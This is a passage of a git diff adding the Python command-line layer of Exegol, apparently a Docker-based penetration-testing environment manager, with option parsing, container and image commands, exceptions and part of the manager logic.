format the name of the object. + Mainly used by developers to easily identify objects""" + return f"Option: {str(self.dest) if self.dest is not None else self.kwargs.get('metavar', 'Option not found')}" + + +class GroupArg: + """This object allows you to group a set of options within the same group""" + + def __init__(self, *options, title: Optional[str] = None, description: Optional[str] = None, + is_global: bool = False): + self.title = title + self.description = description + self.options: Tuple[Dict[str, Union[Option, bool]]] = cast(Tuple[Dict[str, Union[Option, bool]]], options) + self.is_global = is_global + + def __repr__(self) -> str: + """This overload allows to format the name of the object. + Mainly used by developers to easily identify objects""" + return f"GroupArg: {self.title}" + + +class Command: + """The Command class is the root of all CLI actions""" + + def __init__(self): + # Root command usages (can be overwritten by subclasses to display different use cases) + self._pre_usages = "[underline]To see specific examples run:[/underline][italic] exegol [cyan]command[/cyan] -h[/italic]" + self._usages = { + "Install (or build) (↓ ~25GB max)": "exegol install", + "Open an exegol shell": "exegol start", + "Show exegol images & containers": "exegol info", + "Update an image": "exegol update", + "See commands examples to execute": "exegol exec -h", + "Remove a container": "exegol remove", + "Uninstall an image": "exegol uninstall", + "Stop a container": "exegol stop" + } + self._post_usages = "" + + # Name of the object + self.name = type(self).__name__.lower() + # Global parameters + self.verify = Option("-k", "--insecure", + dest="verify", + action="store_false", + default=True, + required=False, + help="Allow insecure server connections for web requests, " + "e.g. 
when fetching info from DockerHub " + "(default: [red not italic]False[/red not italic])") + self.quiet = Option("-q", "--quiet", + dest="quiet", + action="store_true", + default=False, + help="Show no information at all") + self.verbosity = Option("-v", "--verbose", + dest="verbosity", + action="count", + default=0, + help="Verbosity level (-v for verbose, -vv for advanced, -vvv for debug)") + # TODO review non-interactive mode + #self.interactive_mode = Option("--non-interactive", + # dest="interactive_mode", + # action="store_false", + # help="[red](WIP)[/red] Prevents Exegol from interactively requesting information. " + # "If critical information is missing, an error will be raised.") + + # Main global group of argparse + self.groupArgs = [ + GroupArg({"arg": self.verify, "required": False}, + {"arg": self.quiet, "required": False}, + #{"arg": self.interactive_mode, "required": False}, + {"arg": self.verbosity, "required": False}, + title="[blue]Optional arguments[/blue]", + is_global=True) + ] + + def __call__(self, *args, **kwargs): + """This method is called by the main controller (ExegolController) + to get the function, execute it and launch the action. + This method must be overloaded in all child classes to ensure the correct execution of the thread""" + logger.debug("The called command is : ", self.name) + logger.debug("the object is", type(self).__name__) + raise NotImplementedError + + def __repr__(self) -> str: + """This overload allows to format the name of the object. 
+ Mainly used by developers to easily identify objects""" + return self.name + + def populate(self, args: Namespace): + """This method replaces the parsing objects (Option) with the result of the parsing""" + for arg in vars(args).keys(): + # Check if the argument exist in the current class + if arg in self.__dict__: + # If so, overwrite it with the corresponding value after parsing + self.__setattr__(arg, vars(args)[arg]) + + def check_parameters(self) -> List[str]: + """This method identifies the missing required parameters""" + missingOption = [] + for groupArg in self.groupArgs: + for option in groupArg.options: + if option["required"]: + if self.__dict__[option["arg"].dest] is None: + missingOption.append(option["arg"].dest) + return missingOption + + def formatEpilog(self) -> str: + epilog = "[blue]Examples:[/blue]" + os.linesep + epilog += self._pre_usages + os.linesep + keys_len = {} + # Replace [.*] rich tag for line length count + for k in self._usages.keys(): + keys_len[k] = len(re.sub(r"\[/?[^]]+]", '', k, 0, re.MULTILINE)) + max_key = max(keys_len.values()) + for k, v in self._usages.items(): + space = ' ' * (max_key - keys_len.get(k, 0) + 2) + epilog += f" {k}:{space}[i]{v}[/i]{os.linesep}" + epilog += self._post_usages + os.linesep + return epilog diff --git a/exegol/console/cli/actions/ExegolParameters.py b/exegol/console/cli/actions/ExegolParameters.py new file mode 100644 index 00000000..53225e51 --- /dev/null +++ b/exegol/console/cli/actions/ExegolParameters.py @@ -0,0 +1,267 @@ +from exegol.console.cli.actions.Command import Command +from exegol.console.cli.actions.GenericParameters import * +from exegol.manager.ExegolManager import ExegolManager +from exegol.manager.UpdateManager import UpdateManager +from exegol.utils.ExeLog import logger + + +class Start(Command, ContainerCreation, ContainerStart): + """Automatically create, start / resume and enter an Exegol container""" + + def __init__(self): + Command.__init__(self) + 
ContainerCreation.__init__(self, self.groupArgs) + ContainerStart.__init__(self, self.groupArgs) + + self._usages = { + "Start interactively a container": "exegol start", + "Create a [blue]demo[/blue] container using [bright_blue]full[/bright_blue] image": "exegol start [blue]demo[/blue] [bright_blue]full[/bright_blue]", + "Spawn a shell from [blue]demo[/blue] container": "exegol start [blue]demo[/blue]", + "Create a container [blue]test[/blue] with a custom shared workspace": "exegol start [blue]test[/blue] [bright_blue]full[/bright_blue] -w [magenta]./project/pentest/[/magenta]", + "Create a container [blue]test[/blue] sharing the current working directory": "exegol start [blue]test[/blue] [bright_blue]full[/bright_blue] -cwd", + "Create a container [blue]htb[/blue] with a VPN": "exegol start [blue]htb[/blue] [bright_blue]full[/bright_blue] --vpn [magenta]~/vpn/[/magenta][bright_magenta]lab_Dramelac.ovpn[/bright_magenta]", + "Create a container [blue]app[/blue] with custom volume": "exegol start [blue]app[/blue] [bright_blue]full[/bright_blue] -V [bright_magenta]'/var/app/:/app/'[/bright_magenta]", + "Get a [blue]tmux[/blue] shell": "exegol start --shell [blue]tmux[/blue]", + "Use a Proxmark": "exegol start -d /dev/ttyACM0", + "Use an HackRF One": "exegol start -d /dev/bus/usb/", + } + + # Create container start / exec arguments + self.shell = Option("-s", "--shell", + dest="shell", + action="store", + choices={"zsh", "bash", "tmux"}, + default="zsh", + help="Select a shell environment to launch at startup (Default: [blue]zsh[/blue])") + + # Create group parameter for container selection + self.groupArgs.append(GroupArg({"arg": self.shell, "required": False}, + title="[bold cyan]Start[/bold cyan] [blue]specific options[/blue]")) + + def __call__(self, *args, **kwargs): + return ExegolManager.start + + +class Stop(Command, ContainerMultiSelector): + """Stop an Exegol container""" + + def __init__(self): + Command.__init__(self) + 
ContainerMultiSelector.__init__(self, self.groupArgs) + + self._usages = { + "Stop interactively one or multiple container": "exegol stop", + "Stop [blue]demo[/blue]": "exegol stop [blue]demo[/blue]" + } + + def __call__(self, *args, **kwargs): + logger.debug("Running stop module") + return ExegolManager.stop + + +class Install(Command, ImageSelector): + """Install or build Exegol image""" + + def __init__(self): + Command.__init__(self) + ImageSelector.__init__(self, self.groupArgs) + + self._usages = { + "Install or build interactively an exegol image": "exegol install", + "Install or update the [bright_blue]full[/bright_blue] image": "exegol install [bright_blue]full[/bright_blue]", + "Build [bright_blue]local[/bright_blue] image": "exegol install [bright_blue]local[/bright_blue]" + } + + # Create container build arguments + self.build_profile = Option("build_profile", + metavar="BUILD_PROFILE", + choices=UpdateManager.listBuildProfiles().keys(), + nargs="?", + action="store", + help="Select the build profile used to create a local image.") + self.build_log = Option("--build-log", + dest="build_log", + metavar="LOGFILE_PATH", + action="store", + help="Write image building logs to a file.") + + # Create group parameter for container selection + self.groupArgs.append(GroupArg({"arg": self.build_profile, "required": False}, + {"arg": self.build_log, "required": False}, + title="[bold cyan]Build[/bold cyan] [blue]specific options[/blue]")) + + def __call__(self, *args, **kwargs): + logger.debug("Running install module") + return ExegolManager.install + + +class Update(Command, ImageSelector): + """Update an Exegol image""" + + def __init__(self): + Command.__init__(self) + ImageSelector.__init__(self, self.groupArgs) + + self.skip_git = Option("--skip-git", + dest="skip_git", + action="store_true", + help="Skip git updates (wrapper, image sources and exegol resources).") + + # Create group parameter for container selection + self.groupArgs.append(GroupArg({"arg": 
self.skip_git, "required": False}, + title="[bold cyan]Update[/bold cyan] [blue]specific options[/blue]")) + + self._usages = { + "Install or update interactively an exegol image": "exegol update", + "Install or update the [bright_blue]full[/bright_blue] image": "exegol update [bright_blue]full[/bright_blue]" + } + + def __call__(self, *args, **kwargs): + logger.debug("Running update module") + return ExegolManager.update + + +class Uninstall(Command, ImageMultiSelector): + """Remove Exegol [default not bold]image(s)[/default not bold]""" + + def __init__(self): + Command.__init__(self) + ImageMultiSelector.__init__(self, self.groupArgs) + + self.force_mode = Option("-F", "--force", + dest="force_mode", + action="store_true", + help="Remove image without interactive user confirmation.") + + # Create group parameter for container selection + self.groupArgs.append(GroupArg({"arg": self.force_mode, "required": False}, + title="[bold cyan]Uninstall[/bold cyan] [blue]specific options[/blue]")) + + self._usages = { + "Uninstall interactively one or many exegol image": "exegol uninstall", + "Uninstall the [bright_blue]dev[/bright_blue] image": "exegol uninstall [bright_blue]dev[/bright_blue]" + } + + def __call__(self, *args, **kwargs): + logger.debug("Running uninstall module") + return ExegolManager.uninstall + + +class Remove(Command, ContainerMultiSelector): + """Remove Exegol [default not bold]container(s)[/default not bold]""" + + def __init__(self): + Command.__init__(self) + ContainerMultiSelector.__init__(self, self.groupArgs) + + self.force_mode = Option("-F", "--force", + dest="force_mode", + action="store_true", + help="Remove container without interactive user confirmation.") + + # Create group parameter for container selection + self.groupArgs.append(GroupArg({"arg": self.force_mode, "required": False}, + title="[bold cyan]Remove[/bold cyan] [blue]specific options[/blue]")) + + self._usages = { + "Remove interactively one or many containers": "exegol 
remove", + "Remove the [blue]demo[/blue] container": "exegol remove [blue]demo[/blue]" + } + + def __call__(self, *args, **kwargs): + logger.debug("Running remove module") + return ExegolManager.remove + + +class Exec(Command, ContainerCreation, ContainerStart): + """Execute a command on an Exegol container""" + + def __init__(self): + Command.__init__(self) + ContainerCreation.__init__(self, self.groupArgs) + ContainerStart.__init__(self, self.groupArgs) + + self._usages = { + "Execute the command [magenta]bloodhound[/magenta] in the container [blue]demo[/blue]": + "exegol exec [blue]demo[/blue] [magenta]bloodhound[/magenta]", + "Execute the command [magenta]'nmap -h'[/magenta] with console output": + "exegol exec -v [blue]demo[/blue] [magenta]'nmap -h'[/magenta]", + "Execute a command in background within the [blue]demo[/blue] container": + "exegol exec -b [blue]demo[/blue] [magenta]bloodhound[/magenta]", + "Execute the command [magenta]bloodhound[/magenta] in a temporary container based on the [bright_blue]full[/bright_blue] image": + "exegol exec --tmp [bright_blue]full[/bright_blue] [magenta]bloodhound[/magenta]", + "Execute a command in background with a temporary container": + "exegol exec -b --tmp [bright_blue]full[/bright_blue] [magenta]bloodhound[/magenta]", + } + + # Overwrite default selectors + for group in self.groupArgs.copy(): + # Find group containing default selector to remove them + for parameter in group.options: + if parameter.get('arg') == self.containertag or parameter.get('arg') == self.imagetag: + # Removing default GroupArg selector + self.groupArgs.remove(group) + break + # Removing default selector objects + self.containertag = None + self.imagetag = None + + self.selector = Option("selector", + metavar="CONTAINER or IMAGE", + nargs='?', + action="store", + help="Tag used to target an Exegol container (by default) or an image (if --tmp is set).") + + # Custom parameters + self.exec = Option("exec", + metavar="COMMAND", + nargs="+", + 
action="store", + help="Execute a single command in the exegol container.") + self.daemon = Option("-b", "--background", + action="store_true", + dest="daemon", + help="Executes the command in background as a daemon " + "(default: [red not italic]False[/red not italic])") + self.tmp = Option("--tmp", + action="store_true", + dest="tmp", + help="Created a dedicated and temporary container to execute the command " + "(default: [red not italic]False[/red not italic])") + + # Create group parameter for container selection + self.groupArgs.append(GroupArg({"arg": self.selector, "required": False}, + {"arg": self.exec, "required": False}, + {"arg": self.daemon, "required": False}, + {"arg": self.tmp, "required": False}, + title="[bold cyan]Exec[/bold cyan] [blue]specific options[/blue]")) + + def __call__(self, *args, **kwargs): + logger.debug("Running exec module") + return ExegolManager.exec + + +class Info(Command, ContainerSelector): + """Show info on containers and images (local & remote)""" + + def __init__(self): + Command.__init__(self) + ContainerSelector.__init__(self, self.groupArgs) + + self._usages = { + "Print containers and images essentials information": "exegol info", + "Print the detailed configuration of the [blue]demo[/blue] container": "exegol info [blue]demo[/blue]", + "Print verbose information": "exegol info [yellow3]-v[/yellow3]", + "Print advanced information": "exegol info [yellow3]-vv[/yellow3]", + "Print debug information": "exegol info [yellow3]-vvv[/yellow3]" + } + + def __call__(self, *args, **kwargs): + return ExegolManager.info + + +class Version(Command): + """Print current Exegol version""" + + def __call__(self, *args, **kwargs): + return ExegolManager.print_version diff --git a/exegol/console/cli/actions/GenericParameters.py b/exegol/console/cli/actions/GenericParameters.py new file mode 100644 index 00000000..5b115db3 --- /dev/null +++ b/exegol/console/cli/actions/GenericParameters.py @@ -0,0 +1,173 @@ +from typing import List + 
+from exegol.console.cli.actions.Command import Option, GroupArg +from exegol.utils.UserConfig import UserConfig + + +class ContainerSelector: + """Generic parameter class for container selection""" + + def __init__(self, groupArgs: List[GroupArg]): + # Create container selector arguments + self.containertag = Option("containertag", + metavar="CONTAINER", + nargs='?', + action="store", + help="Tag used to target an Exegol container") + + # Create group parameter for container selection + groupArgs.append(GroupArg({"arg": self.containertag, "required": False}, + title="[blue]Container selection options[/blue]")) + + +class ContainerMultiSelector: + """Generic parameter class for container multi selection""" + + def __init__(self, groupArgs: List[GroupArg]): + # Create container selector arguments + self.multicontainertag = Option("multicontainertag", + metavar="CONTAINER", + nargs='*', + action="store", + help="Tag used to target one or multiple Exegol container") + + # Create group parameter for container multi selection + groupArgs.append(GroupArg({"arg": self.multicontainertag, "required": False}, + title="[blue]Containers selection options[/blue]")) + + +class ContainerStart: + """Generic parameter class for container selection""" + + def __init__(self, groupArgs: List[GroupArg]): + # Create options on container start + self.envs = Option("-e", "--env", + action="append", + default=[], + dest="envs", + help="And an environment variable on Exegol (format: --env KEY=value). The variables " + "configured during the creation of the container will be persistent in all shells. 
" + "If the container already exists, the variable will be present only in the current shell") + + # Create group parameter for container options at start + groupArgs.append(GroupArg({"arg": self.envs, "required": False}, + title="[blue]Container start options[/blue]")) + + +class ImageSelector: + """Generic parameter class for image selection""" + + def __init__(self, groupArgs: List[GroupArg]): + # Create image selector arguments + self.imagetag = Option("imagetag", + metavar="IMAGE", + nargs='?', + action="store", + help="Tag used to target an Exegol image") + + # Create group parameter for image selection + groupArgs.append(GroupArg({"arg": self.imagetag, "required": False}, + title="[blue]Image selection options[/blue]")) + + +class ImageMultiSelector: + """Generic parameter class for image multi selection""" + + def __init__(self, groupArgs: List[GroupArg]): + # Create image multi selector arguments + self.multiimagetag = Option("multiimagetag", + metavar="IMAGE", + nargs='*', + action="store", + help="Tag used to target one or multiple Exegol image") + + # Create group parameter for image multi selection + groupArgs.append(GroupArg({"arg": self.multiimagetag, "required": False}, + title="[blue]Images selection options[/blue]")) + + +class ContainerCreation(ContainerSelector, ImageSelector): + """Generic parameter class for container creation""" + + def __init__(self, groupArgs: List[GroupArg]): + # Init parents : ContainerStart > ContainerSelector + ContainerSelector.__init__(self, groupArgs) + ImageSelector.__init__(self, groupArgs) + + self.X11 = Option("--disable-X11", + action="store_false", + default=True, + dest="X11", + help="Disable display sharing to run GUI-based applications (default: [green]Enabled[/green])") + self.shared_resources = Option("--disable-my-resources", + action="store_false", + default=True, + dest="shared_resources", + help=f"Disable the mount of the shared resources (/my-resources) from the host 
({UserConfig().shared_resources_path}) (default: [green]Enabled[/green])") + self.exegol_resources = Option("--disable-exegol-resources", + action="store_false", + default=True, + dest="exegol_resources", + help=f"Disable the mount of the exegol resources (/opt/resources) from the host ({UserConfig().exegol_resources_path}) (default: [green]Enabled[/green])") + self.host_network = Option("--disable-shared-network", + action="store_false", + default=True, + dest="host_network", + help="Disable the sharing of the host's network interfaces with exegol (default: [green]Enabled[/green])") + self.share_timezone = Option("--disable-shared-timezones", + action="store_false", + default=True, + dest="share_timezone", + help="Disable the sharing of the host's time and timezone configuration with exegol (default: [green]Enabled[/green])") + self.mount_current_dir = Option("-cwd", "--cwd-mount", + dest="mount_current_dir", + action="store_true", + default=False, + help="This option is a shortcut to set the /workspace folder to the user's current working directory") + self.workspace_path = Option("-w", "--workspace", + dest="workspace_path", + action="store", + help="The specified host folder will be linked to the /workspace folder in the container") + self.volumes = Option("-V", "--volume", + action="append", + default=[], + dest="volumes", + help="Share a new volume between host and exegol (format: --volume /host/path/:/exegol/mount/)") + self.privileged = Option("--privileged", + dest="privileged", + action="store_true", + default=False, + help="[orange3](dangerous)[/orange3] give extended privileges at the container creation (e.g. 
needed to " + "mount things, to use wifi or bluetooth)") + self.devices = Option("-d", "--device", + dest="devices", + default=[], + action="append", + help="Add host [default not bold]device(s)[/default not bold] at the container creation (example: -d /dev/ttyACM0 -d /dev/bus/usb/)") + + self.vpn = Option("--vpn", + dest="vpn", + default=None, + action="store", + help="Setup an OpenVPN connection at the container creation (example: --vpn /home/user/vpn/conf.ovpn)") + self.vpn_auth = Option("--vpn-auth", + dest="vpn_auth", + default=None, + action="store", + help="Enter the credentials with a file (first line: username, second line: password) to establish the VPN connection automatically (example: --vpn-auth /home/user/vpn/auth.txt)") + + groupArgs.append(GroupArg({"arg": self.workspace_path, "required": False}, + {"arg": self.mount_current_dir, "required": False}, + {"arg": self.volumes, "required": False}, + {"arg": self.privileged, "required": False}, + {"arg": self.devices, "required": False}, + {"arg": self.X11, "required": False}, + {"arg": self.shared_resources, "required": False}, + {"arg": self.exegol_resources, "required": False}, + {"arg": self.host_network, "required": False}, + {"arg": self.share_timezone, "required": False}, + title="[blue]Container creation options[/blue]")) + + groupArgs.append(GroupArg({"arg": self.vpn, "required": False}, + {"arg": self.vpn_auth, "required": False}, + title="[blue]Container creation VPN options[/blue]")) diff --git a/exegol/console/cli/actions/__init__.py b/exegol/console/cli/actions/__init__.py new file mode 100644 index 00000000..e69de29b diff --git a/exegol/exceptions/ExegolExceptions.py b/exegol/exceptions/ExegolExceptions.py new file mode 100644 index 00000000..b75aad3d --- /dev/null +++ b/exegol/exceptions/ExegolExceptions.py @@ -0,0 +1,14 @@ +# Exceptions specific to the successful operation of exegol +class ObjectNotFound(Exception): + """Custom exception when a specific container do not exist""" + pass + 
+ +class ProtocolNotSupported(Exception): +    """Custom exception when a specific network protocol is not supported""" +    pass + + +class CancelOperation(Exception): +    """Custom exception when an error occurred and the operation must be canceled or skipped""" +    pass diff --git a/exegol/exceptions/__init__.py b/exegol/exceptions/__init__.py new file mode 100644 index 00000000..e69de29b diff --git a/exegol/manager/ExegolController.py b/exegol/manager/ExegolController.py new file mode 100644 index 00000000..9101e7a7 --- /dev/null +++ b/exegol/manager/ExegolController.py @@ -0,0 +1,40 @@ +from exegol.console.cli.ParametersManager import ParametersManager +from exegol.console.cli.actions.ExegolParameters import Command +from exegol.utils.ExeLog import logger, ExeLog, console + + +class ExegolController: +    """Main controller of exegol""" + +    # Get action selected by user +    # (ParametersManager must be loaded from ExegolController first to load every Command subclass) +    __action: Command = ParametersManager().getCurrentAction() + +    @classmethod +    def call_action(cls): +        """Dynamically retrieve the main function corresponding to the action selected by the user +        and execute it on the main thread""" +        # Check for missing parameters +        missing_params = cls.__action.check_parameters() +        if len(missing_params) == 0: +            # Fetch main operation function +            main_action = cls.__action() +            # Execute main function +            main_action() +        else: +            # TODO review required parameters +            logger.error(f"These parameters are mandatory but missing: {','.join(missing_params)}") + + +def main(): +    """Exegol main console entrypoint""" +    try: +        # Set logger verbosity depending on user input +        ExeLog.setVerbosity(ParametersManager().verbosity, ParametersManager().quiet) +        # Start Main controller & Executing action selected by user CLI +        ExegolController.call_action() +    except KeyboardInterrupt: +        logger.empty_line() +        logger.info("Exiting") +    except Exception: +        console.print_exception(show_locals=True) diff
--git a/exegol/manager/ExegolManager.py b/exegol/manager/ExegolManager.py new file mode 100644 index 00000000..4b9be575 --- /dev/null +++ b/exegol/manager/ExegolManager.py @@ -0,0 +1,493 @@ +import binascii +import logging +import os +from typing import Union, List, Tuple, Optional, cast, Sequence + +from exegol.console.ConsoleFormat import boolFormatter +from exegol.console.ExegolPrompt import Confirm +from exegol.console.TUI import ExegolTUI +from exegol.console.cli.ParametersManager import ParametersManager +from exegol.console.cli.actions.GenericParameters import ContainerCreation +from exegol.exceptions.ExegolExceptions import ObjectNotFound, CancelOperation +from exegol.manager.UpdateManager import UpdateManager +from exegol.model.ContainerConfig import ContainerConfig +from exegol.model.ExegolContainer import ExegolContainer +from exegol.model.ExegolContainerTemplate import ExegolContainerTemplate +from exegol.model.ExegolImage import ExegolImage +from exegol.model.ExegolModules import ExegolModules +from exegol.model.SelectableInterface import SelectableInterface +from exegol.utils.ConstantConfig import ConstantConfig +from exegol.utils.DockerUtils import DockerUtils +from exegol.utils.EnvInfo import EnvInfo +from exegol.utils.ExeLog import logger, ExeLog +from exegol.utils.UserConfig import UserConfig + + +class ExegolManager: + """Contains the main procedures of all actions available in Exegol""" + + # Cache data + __container: Union[Optional[ExegolContainer], List[ExegolContainer]] = None + __image: Union[Optional[ExegolImage], List[ExegolImage]] = None + + # Runtime default configuration + __interactive_mode = False + + @classmethod + def info(cls): + """Print a list of available images and containers on the current host""" + ExegolManager.print_version() + if logger.isEnabledFor(ExeLog.VERBOSE): + logger.verbose("Listing user configurations") + ExegolTUI.printTable(UserConfig().get_configs(), title="[not italic]:brain: [/not italic][gold3][g]User 
configurations[/g][/gold3]") + if logger.isEnabledFor(ExeLog.ADVANCED): + logger.verbose("Listing git repositories") + ExegolTUI.printTable(UpdateManager.listGitStatus(), title="[not italic]:octopus: [/not italic][gold3][g]Project modules[/g][/gold3]") + if bool(ParametersManager().containertag): + # If the user have supplied a container name, show container config + container = cls.__loadOrCreateContainer(ParametersManager().containertag, must_exist=True) + if container is not None: + ExegolTUI.printContainerRecap(container) + else: + # Without any parameter, show all images and containers info + # Fetch data + images = DockerUtils.listImages(include_version_tag=False) + containers = DockerUtils.listContainers() + # List and print images + logger.verbose("Listing local and remote Exegol images") + ExegolTUI.printTable(images) + # List and print containers + logger.verbose("Listing local Exegol containers") + logger.raw(f"[bold blue][*][/bold blue] Number of Exegol containers: {len(containers)}{os.linesep}", + markup=True) + ExegolTUI.printTable(containers) + + @classmethod + def start(cls): + """Create and/or start an exegol container to finally spawn an interactive shell""" + logger.info("Starting exegol") + # TODO add console logging capabilities + # Check if the first positional parameter have been supplied + cls.__interactive_mode = not bool(ParametersManager().containertag) + if not cls.__interactive_mode: + logger.info("Arguments supplied with the command, skipping interactive mode") + container = cls.__loadOrCreateContainer() + if not container.isNew(): + # Check and warn user if some parameters don't apply to the current session + cls.__checkUselessParameters() + container.start() + container.spawnShell() + + @classmethod + def exec(cls): + """Create and/or start an exegol container to execute a specific command. 
+ The execution can be seen in console output or be relayed in the background as a daemon.""" + logger.info("Starting exegol") + if ParametersManager().tmp: + container = cls.__createTmpContainer(ParametersManager().selector) + if not ParametersManager().daemon: + container.exec(command=ParametersManager().exec, as_daemon=False) + container.stop(timeout=2) + else: + logger.success(f"Command executed as entrypoint of the container {container.hostname}") + else: + container = cls.__loadOrCreateContainer(override_container=ParametersManager().selector) + container.exec(command=ParametersManager().exec, as_daemon=ParametersManager().daemon) + + @classmethod + def stop(cls): + """Stop an exegol container""" + logger.info("Stopping exegol") + container = cls.__loadOrCreateContainer(multiple=True, must_exist=True) + for c in container: + c.stop(timeout=2) + + @classmethod + def install(cls): + """Pull or build a docker exegol image""" + try: + if not ExegolModules().isExegolResourcesReady(): + raise CancelOperation + except CancelOperation: + # Error during installation, skipping operation + logger.warning("Exegol resources have not been downloaded, the feature cannot be enabled") + UpdateManager.updateImage(install_mode=True) + + @classmethod + def update(cls): + """Update python wrapper (git installation required) and Pull a docker exegol image""" + if not ParametersManager().skip_git: + UpdateManager.updateWrapper() + UpdateManager.updateImageSource() + UpdateManager.updateResources() + UpdateManager.updateImage() + + @classmethod + def uninstall(cls): + """Remove an exegol image""" + logger.info("Uninstalling an exegol image") + # Set log level to verbose in order to show every image installed including the outdated. + if not logger.isEnabledFor(ExeLog.VERBOSE): + logger.setLevel(ExeLog.VERBOSE) + images = cls.__loadOrInstallImage(multiple=True, must_exist=True) + if len(images) == 0: + logger.error("No images were selected. 
Exiting.") + return + all_name = ", ".join([x.getName() for x in images]) + if not ParametersManager().force_mode and not Confirm( + f"Are you sure you want to [red]permanently remove[/red] the following images? [orange3][ {all_name} ][/orange3]", + default=False): + logger.error("Aborting operation.") + return + for img in images: + DockerUtils.removeImage(img) + + @classmethod + def remove(cls): + """Remove an exegol container""" + logger.info("Removing an exegol container") + containers = cls.__loadOrCreateContainer(multiple=True, must_exist=True) + if len(containers) == 0: + logger.error("No containers were selected. Exiting.") + return + all_name = ", ".join([x.name for x in containers]) + if not ParametersManager().force_mode and not Confirm( + f"Are you sure you want to [red]permanently remove[/red] the following containers? [orange3][ {all_name} ][/orange3]", + default=False): + logger.error("Aborting operation.") + return + for c in containers: + c.remove() + # If the image used is deprecated, it must be deleted after the removal of its container + if c.image.isLocked(): + DockerUtils.removeImage(c.image, upgrade_mode=True) + + @classmethod + def print_version(cls): + """Show exegol version (and context configuration on debug mode)""" + logger.raw(f"[bold blue][*][/bold blue] Exegol is currently in version v{ConstantConfig.version}{os.linesep}", + level=logging.INFO, markup=True) + logger.debug(f"Pip installation: {boolFormatter(ConstantConfig.pip_installed)}") + logger.debug(f"Git source installation: {boolFormatter(ConstantConfig.git_source_installation)}") + logger.debug(f"Host OS: {EnvInfo.getHostOs()}") + if EnvInfo.isWindowsHost(): + logger.debug(f"Python environment: {EnvInfo.current_platform}") + logger.debug(f"Docker engine: {EnvInfo.getDockerEngine().upper()}") + logger.debug(f"Windows release: {EnvInfo.getWindowsRelease()}") + + @classmethod + def __loadOrInstallImage(cls, + override_image: Optional[str] = None, + multiple: bool = False, + 
must_exist: bool = False) -> Union[Optional[ExegolImage], List[ExegolImage]]: + """Select / Load (and install) an ExegolImage + When must_exist is set to True, return None if no image are installed + When multiple is set to True, return a list of ExegolImage + Otherwise, always return an ExegolImage""" + if cls.__image is not None: + # Return cache + return cls.__image + image_tag = override_image if override_image is not None else ParametersManager().imagetag + image_tags = ParametersManager().multiimagetag + image_selection: Union[Optional[ExegolImage], List[ExegolImage]] = None + # While an image have not been selected + while image_selection is None: + try: + if image_tag is None and (image_tags is None or len(image_tags) == 0): + # Interactive (TUI) image selection + image_selection = cast(Union[Optional[ExegolImage], List[ExegolImage]], + cls.__interactiveSelection(ExegolImage, multiple, must_exist)) + else: + # Select image by tag name (non-interactive) + if multiple: + image_selection = [] + for image_tag in image_tags: + image_selection.append(DockerUtils.getInstalledImage(image_tag)) + else: + image_selection = DockerUtils.getInstalledImage(image_tag) + except ObjectNotFound: + # ObjectNotFound is raised when the image_tag provided by the user does not match any existing image. 
+ if image_tag is not None: + logger.warning(f"The image named '{image_tag}' has not been found.") + # If the user's selected image have not been found, + # offer to build a local image with this name + # (only if must_exist is not set) + if not must_exist: + image_selection = UpdateManager.updateImage(image_tag) + # Allow the user to interactively select another installed image + image_tag = None + except IndexError: + # IndexError is raised when no image are available (not applicable when multiple is set, return an empty array) + # (raised from TUI interactive selection) + if must_exist: + # If there is no image installed, return none + logger.error("No images were found") + return [] if multiple else None + else: + # If the user's selected image have not been found, offer the choice to build a local image at this name + # (only if must_exist is not set) + image_selection = UpdateManager.updateImage(image_tag) + image_tag = None + # Checks if an image has been selected + if image_selection is None: + # If not, retry the selection + logger.error("No image has been selected.") + continue + + # Check if every image are installed + install_status, checked_images = cls.__checkImageInstallationStatus(image_selection, multiple, must_exist) + if not install_status: + # If one of the image is not install where it supposed to, restart the selection + # allowing him to interactively choose another image + image_selection, image_tag = None, None + continue + + cls.__image = cast(Union[Optional[ExegolImage], List[ExegolImage]], checked_images) + return cls.__image + + @classmethod + def __checkImageInstallationStatus(cls, + image_selection: Union[ExegolImage, List[ExegolImage]], + multiple: bool = False, + must_exist: bool = False + ) -> Tuple[bool, Optional[Union[ExegolImage, ExegolContainer, List[ExegolImage], List[ExegolContainer]]]]: + """Checks if the selected images are installed and ready for use. 
+        returns false if the images are supposed to be already installed.""" +        # Checks if one or more images have been selected and unifies the format into a list. +        reverse_type = False +        check_img: List[ExegolImage] +        if type(image_selection) is ExegolImage: +            check_img = [image_selection] +            # Tag of the operation to reverse it before the return +            reverse_type = True +        elif type(image_selection) is list: +            check_img = image_selection +        else: +            check_img = [] + +        # Check if every image is installed +        for i in range(len(check_img)): +            if not check_img[i].isInstall(): +                # If must_exist is set, every image is supposed to be already installed +                if must_exist: +                    logger.error(f"The selected image '{check_img[i].getName()}' is not installed.") +                    # If one of the image is not install, return False to restart the selection +                    return False, None +                else: +                    # Check if the selected image is installed and install it +                    logger.warning("The selected image is not installed.") +                    # Download remote image +                    if DockerUtils.downloadImage(check_img[i], install_mode=True): +                        # Select installed image +                        check_img[i] = DockerUtils.getInstalledImage(check_img[i].getName()) +                    else: +                        logger.error("This image cannot be installed.") +                        return False, None + +        if reverse_type and not multiple: +            # Restoration of the original type +            return True, check_img[0] +        return True, check_img + +    @classmethod +    def __loadOrCreateContainer(cls, +                                override_container: Optional[str] = None, +                                multiple: bool = False, +                                must_exist: bool = False) -> Union[Optional[ExegolContainer], List[ExegolContainer]]: +        """Select one or multiple ExegolContainer +        Or create a new ExegolContainer if no one already exist (and must_exist is not set) +        When must_exist is set to True, return None if no container exist +        When multiple is set to True, return a list of ExegolContainer""" +        if cls.__container is not None: +            # Return cache +            return cls.__container +        container_tag: Optional[str] = override_container if override_container is not
None else ParametersManager().containertag + container_tags: Optional[Sequence[str]] = ParametersManager().multicontainertag + try: + if container_tag is None and (container_tags is None or len(container_tags) == 0): + # Interactive container selection + cls.__container = cast(Union[Optional[ExegolContainer], List[ExegolContainer]], + cls.__interactiveSelection(ExegolContainer, multiple, must_exist)) + else: + # Try to find the corresponding container + if multiple: + cls.__container = [] + assert container_tags is not None + # test each user tag + for container_tag in container_tags: + try: + cls.__container.append(DockerUtils.getContainer(container_tag)) + except ObjectNotFound: + # on multi select, an object not found is not critical + if must_exist: + # If the selected tag doesn't match any container, print an alert and continue + logger.warning(f"The container named '{container_tag}' has not been found") + else: + # If there is a multi select without must_exist flag, raise an error + # because multi container creation is not supported + raise NotImplemented + else: + assert container_tag is not None + cls.__container = DockerUtils.getContainer(container_tag) + except (ObjectNotFound, IndexError): + # ObjectNotFound is raised when the container_tag provided by the user does not match any existing container. 
